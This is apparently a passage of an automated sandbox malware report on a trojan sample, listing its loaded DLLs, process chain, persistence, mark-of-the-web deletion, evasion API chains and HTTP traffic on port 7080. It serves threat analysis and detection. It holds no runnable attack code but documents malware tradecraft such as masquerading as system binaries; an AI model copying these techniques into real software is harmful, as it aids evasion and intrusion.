                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FDA28E2_2_01FDA28E
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD5A7E2_2_01FD5A7E
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD5E672_2_01FD5E67
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E86F04_2_021E86F0
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E83304_2_021E8330
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E7B304_2_021E7B30
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E68604_2_021E6860
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E41904_2_021E4190
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E41B74_2_021E41B7
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E42C94_2_021E42C9
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E3CE04_2_021E3CE0
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E3EE04_2_021E3EE0
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_0059587E4_2_0059587E
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00595D554_2_00595D55
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00595D2E4_2_00595D2E
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00595A7E4_2_00595A7E
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00595E674_2_00595E67
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_005996CE4_2_005996CE
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00599ECE4_2_00599ECE
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_0059A28E4_2_0059A28E
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_005983FE4_2_005983FE
                      Source: mNtu4X8ZyE.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/0@1/100
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle,0_2_02678CA0
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle,2_2_021B8CA0
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E4FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CloseHandle,4_2_021E4FD0
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02675390 ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,0_2_02675390
                      Source: mNtu4X8ZyE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: mNtu4X8ZyE.exeReversingLabs: Detection: 78%
                      Source: unknownProcess created: C:\Users\user\Desktop\mNtu4X8ZyE.exe "C:\Users\user\Desktop\mNtu4X8ZyE.exe"
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeProcess created: C:\Windows\SysWOW64\expand\regedit.exe "C:\Windows\SysWOW64\expand\regedit.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                      Source: C:\Windows\SysWOW64\expand\regedit.exeProcess created: C:\Windows\SysWOW64\winhttpcom\wpnclient.exe "C:\Windows\SysWOW64\winhttpcom\wpnclient.exe"
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeProcess created: C:\Windows\SysWOW64\expand\regedit.exe "C:\Windows\SysWOW64\expand\regedit.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeProcess created: C:\Windows\SysWOW64\winhttpcom\wpnclient.exe "C:\Windows\SysWOW64\winhttpcom\wpnclient.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: msvcp60.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: feclient.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: msvcp60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: feclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: msvcp60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: feclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_00401600 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,EncryptFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,LoadIconA,LoadCursorA,GetStockObject,RegisterClassA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,CreateWindowExA,ShowWindow,UpdateWindow,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,TranslateMessage,DispatchMessageA,GetMessageA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401600
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02676240 push ecx; mov dword ptr [esp], 00008F23h0_2_02676241
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02676140 push ecx; mov dword ptr [esp], 00004AF2h0_2_02676141
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02676320 push ecx; mov dword ptr [esp], 00009128h0_2_02676321
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02676220 push ecx; mov dword ptr [esp], 00004B50h0_2_02676221
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026760F0 push ecx; mov dword ptr [esp], 0000A172h0_2_026760F1
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026762D0 push ecx; mov dword ptr [esp], 00001969h0_2_026762D1
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026761D0 push ecx; mov dword ptr [esp], 00004B56h0_2_026761D1
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026762A0 push ecx; mov dword ptr [esp], 0000BFAAh0_2_026762A1
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026761B0 push ecx; mov dword ptr [esp], 000003A6h0_2_026761B1
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02676180 push ecx; mov dword ptr [esp], 0000D106h0_2_02676181
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02676090 push ecx; mov dword ptr [esp], 0000BAD9h0_2_02676091
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217E3E push ecx; mov dword ptr [esp], 0000BFAAh0_2_02217E3F
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217E6E push ecx; mov dword ptr [esp], 00001969h0_2_02217E6F
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217EBE push ecx; mov dword ptr [esp], 00009128h0_2_02217EBF
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_0221FF7E push esp; retf 0_2_0221FF7F
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_0222C7B2 push edi; iretd 0_2_0222C7B3
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_0222ABBE push edi; iretd 0_2_0222ABBF
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_022257F0 push eax; ret 0_2_022257F3
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_022293C6 push ecx; retf 0_2_022293C7
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02228FCA push ecx; retf 0_2_02228FCB
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217C2E push ecx; mov dword ptr [esp], 0000BAD9h0_2_02217C2F
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02220404 push C9686868h; iretd 0_2_02220409
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217C8E push ecx; mov dword ptr [esp], 0000A172h0_2_02217C8F
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217CDE push ecx; mov dword ptr [esp], 00004AF2h0_2_02217CDF
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217D1E push ecx; mov dword ptr [esp], 0000D106h0_2_02217D1F
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217D6E push ecx; mov dword ptr [esp], 00004B56h0_2_02217D6F
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217D4E push ecx; mov dword ptr [esp], 000003A6h0_2_02217D4F
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217DBE push ecx; mov dword ptr [esp], 00004B50h0_2_02217DBF
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02217DDE push ecx; mov dword ptr [esp], 00008F23h0_2_02217DDF
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B6320 push ecx; mov dword ptr [esp], 00009128h2_2_021B6321
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B6220 push ecx; mov dword ptr [esp], 00004B50h2_2_021B6221

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\expand\regedit.exeExecutable created and started: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeExecutable created and started: C:\Windows\SysWOW64\expand\regedit.exeJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exePE file moved: C:\Windows\SysWOW64\expand\regedit.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeFile opened: C:\Windows\SysWOW64\expand\regedit.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeFile opened: C:\Windows\SysWOW64\winhttpcom\wpnclient.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 7080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 7080

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\expand\regedit.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-13404
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-13257
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,0_2_02675390
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,2_2_021B5390
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exe TID: 7364Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02673A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,0_2_02673A20
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,2_2_021B3A20
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,4_2_021E3A20
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000002.2541739448.000000000061E000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000003.2232761331.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000003.00000002.2541665030.0000021035C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeAPI call chain: ExitProcess graph end nodegraph_0-13070
                      Source: C:\Windows\SysWOW64\expand\regedit.exeAPI call chain: ExitProcess graph end nodegraph_2-13983
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeAPI call chain: ExitProcess graph end nodegraph_4-13115
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_00401600 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,EncryptFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,LoadIconA,LoadCursorA,GetStockObject,RegisterClassA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,CreateWindowE